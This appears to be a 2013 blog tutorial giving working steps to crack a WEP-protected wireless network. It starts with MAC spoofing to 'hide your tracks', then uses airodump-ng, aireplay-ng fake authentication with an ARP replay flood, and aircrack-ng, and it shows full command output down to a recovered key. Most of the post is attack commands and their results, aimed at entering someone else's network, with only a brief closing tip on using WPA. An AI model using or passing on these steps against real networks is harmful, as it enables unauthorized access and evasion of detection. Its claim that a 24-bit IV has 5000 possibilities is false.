Saturday, June 1, 2013

Cracking WEP

Most home routers these days are defaulted to use WPA encryption (which can be cracked, but we'll be covering that later) but most older ones (a lot DLink ones I've noticed) use WEP. WEP is very insecure as you'll see in about ten minutes when you crack it.

First you'll want to boot up Backtrack or Kali; you could theoretically use any linux-distro and install the tools separately, but who has time for that. I personally keep Kali on an SD card and boot into live-mode on my laptop when I need it.

Hiding Your Tracks

Because network cracking can you get in trouble, we'll want to hide our MAC address before we begin. BT (I'm going to refer to both Backtrack and Kali as BT from now on) has a nifty tool install for this called simply macchanger.
airmon-ng stop
ifconfig wlan0 down
macchanger —mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
This will stop airmon-ng from monitoring, shutdown your wlan0 interface, change it's MAC address to 00:11:22:33:44:55 (how original), then start up the monitoring again. Turning on airmon-ng gives us a virtual interface, mon0, which we will be using from here on out.

Reconnaissance 

We'll first want to scan area within range for available wireless networks. You should see at least a few pop up as there is an overabundance of wireless networks..everywhere. To start the scan, open up a new terminal and execute airodump-ng. Press Ctrl-C to kill it after you determine it's not going to find anymore WLANs.
airodump-ng

CH  7 ][ Elapsed: 48 s ][ 2013-06-01 20:49                                  
                                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                             
 00:22:6B:4D:13:0A  -49      119       17    0   6  54   WEP  WEP         dotscafe
 B0:E7:54:A7:B7:A9  -82       56        0    0  11  54 . WEP  WEP         BELL237
 34:EF:44:F8:6D:A9  -88       11        0    0   9  54 . WPA  TKIP   PSK  abby
 78:CD:8E:66:3E:51  -89        1        1    0  10  54e  WPA  TKIP   PSK  dave
                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe  
                                                                             
 00:22:6B:4D:13:0A  60:A1:0A:1E:0B:5D  -63    0 -54      0       10          
 00:22:6B:4D:13:0A  98:0C:82:8A:52:38  -83    1 -24      0        4                       
 B0:E7:54:A7:B7:A9  38:AA:3C:75:83:E3  -83    0 - 1      0        1          
 B0:E7:54:A7:B7:A9  38:AA:3C:75:83:E3  -83    0 - 1      0        1  

Data Collection

As you can see there's a plethora of information about each AP. The things we're most concerned with is the BSSID and the Channel (CH) it's operating on. We can run airodump-ng again, this time giving it some specifics. The bell237 in the command is the file name were the traffic capture is going to be dumped; for consistency's sake, I generally keep the file name the same as the ESSID.
airodump-ng -c 11 -w bell237 --bssid B0:E7:54:A7:B7:A9 mon0
CH 11 ][ Elapsed: 2 mins ][ 2013-06-01 21:01                                
                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                             
 B0:E7:54:A7:B7:A9  -78  96     1254    50485    0  11  54 . WEP  WEP         BELL237
                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe  
                                                                             
 B0:E7:54:A7:B7:A9  00:11:22:33:44:55    0    0 - 1   52425   107860          
 B0:E7:54:A7:B7:A9  28:6A:BA:17:AD:65  -87    0 - 1      0        1            
 B0:E7:54:A7:B7:A9  38:AA:3C:75:83:E3  -83   11 - 1      0      254          
 B0:E7:54:A7:B7:A9  28:6A:BA:17:AD:65  -87    0 - 1      0        1  

Now at this point, you could just let airodump-ng run and gather the air packets on it's own. But we both know by looking at how fast that Data number is climbing it'll be a long wait. To speed things along we're going to associate ourselves with the AP and start a flood. You'll wait to leave airodump-ng running while you do this, so open up a new terminal. The -1 option sets the attack mode to a fake authentication and the 0 is auto number of packets per burst (the default is 1).
aireplay-ng -1 0 -a B0:E7:54:A7:B7:A9 -h 00:11:22:33:44:55 -e BELL237 mon0
The interface MAC (XX:XX:XX:XX:XX:XX) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:11:22:33:44:55
20:54:05  Waiting for beacon frame (BSSID: B0:E7:54:A7:B7:A9) on channel 11
20:54:05  Sending Authentication Request (Open System) [ACK]
20:54:05  Authentication successful
20:54:05  Sending Association Request [ACK]
20:54:05  Association successful :-) (AID: 1)

Now that we're authenticated we can begin to flood. We'll be flooding ARP-requests, which is what the -3 option in our command denotes.
aireplay-ng -3 -b B0:E7:54:A7:B7:A9 -h 00:11:22:33:44:55 mon0
You'll soon see that terminal overflow with ARP-requests; just let it go. If we go back to our other terminal where we left airodump running you'll see the #Data column sky-rocket, the number represents the number of IVs (or Initialization Vectors) that we have collected so far, each WEP data packet has a 3-byte IV. We'll want to collect a heap of them to use because the WEP IV is only 24-bit, meaning it'll only have 5000 possibilities. And the flood has begin. Let it go till it hits about 50,000. When it gets there, you can go ahead and kill both applications (but leave don't close the windows).

Attack

In one of the two terminals (or a new one if you prefer) we'll need to load our capture file from airodump into aircrack-ng to actually crack the IVs we collected earlier. The IVs are encrypted and aircrack will attempt to run them against a set of statistical attacks. In the event that aircrack fails (and believe me it can), just go back to the two terminals we were using for airodump and aireplay and run them again, this time until twice as many IVs have been captures (now you know why I told you not to close the windows!).

aircrack-ng -b B0:E7:54:A7:B7:A9 bell237-01.cap
Opening bell237-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50484 ivs.

                                    Aircrack-ng 1.1

                    [00:00:02] Tested 1388233 keys (got 50338 IVs)
   KB    depth   byte(vote)
    0    0/  1   28(63232) 8A(59136) 2F(58880) 93(58880) F0(58624) 88(58368)
    1    0/  1   55(70656) 12(59648) 21(58880) F8(58880) 9A(58368) CF(58368)
    2    0/  2   07(62464) E4(61696) 9E(60672) 7C(58624) 33(57088) 6E(57088)
    3    0/  1   74(71168) 53(60416) D9(59392) E9(58112) ED(57856) 0E(57344)
    4    0/  1   30(74752) 43(58368) 68(58368) 5C(57600) A2(57600) 52(57088)
    5    0/  1   19(63488) 4D(61184) AC(60928) 05(58624) 5A(58624) 89(58624)
    6    0/  1   75(74752) 29(60160) 4D(59904) 86(59904) 30(59392) 57(58880)
    7    2/  4   B4(60928) 4E(60416) 54(60416) 3E(60160) 47(58368) B8(58112)
    8    1/  3   46(60672) 9F(59904) 05(58880) 27(58624) 2B(58368) BD(58112)
    9    0/  1   48(66048) 86(60160) A2(60160) 32(57856) AE(57600) EE(57600)
   10    0/  1   54(62464) DF(58624) FD(57856) 7A(57600) 46(57344) 0C(56832)
   11    0/  1   64(71936) 48(59392) 11(59136) 66(59136) 86(57600) 88(57600)
   12   26/ 12   ED(55040) 83(54784) 90(54784) C4(54784) 05(54528) 14(54528)
     KEY FOUND! [ 28:55:07:74:30:19:75:98:46:48:54:64:38 ]
Decrypted correctly: 100%

And that's it! Pop the key (without the colons) into the authentication prompt for the wireless network and you're set. This just shows you how easy it is to get into someone else's LAN, make sure you keep your private network protected with at least WPA and if possible WPA2.
Posted by at No comments:
Labels: , , , ,
Subscribe to: Posts (Atom)